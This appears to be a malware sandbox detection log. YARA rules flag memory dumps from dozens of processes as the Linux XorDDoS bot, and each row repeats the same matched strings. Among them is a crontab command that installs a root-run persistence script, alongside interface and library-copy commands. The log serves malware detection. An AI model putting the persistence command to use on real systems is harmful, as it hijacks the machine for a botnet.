6234.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6234.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6306.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6306.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6444.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6444.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6462.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6462.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6377.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6377.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6470.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6470.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6309.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6309.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6301.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6301.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6533.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6533.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6393.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6393.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6489.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6489.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6375.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6375.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6268.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6268.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6539.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6539.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6286.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6286.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6273.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6273.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6334.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6334.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6427.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6427.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6476.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6476.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6399.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6399.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6232.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6232.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6380.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6380.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6554.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6554.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6271.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6271.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6468.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6468.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6484.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6484.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6495.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6495.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6315.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6315.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
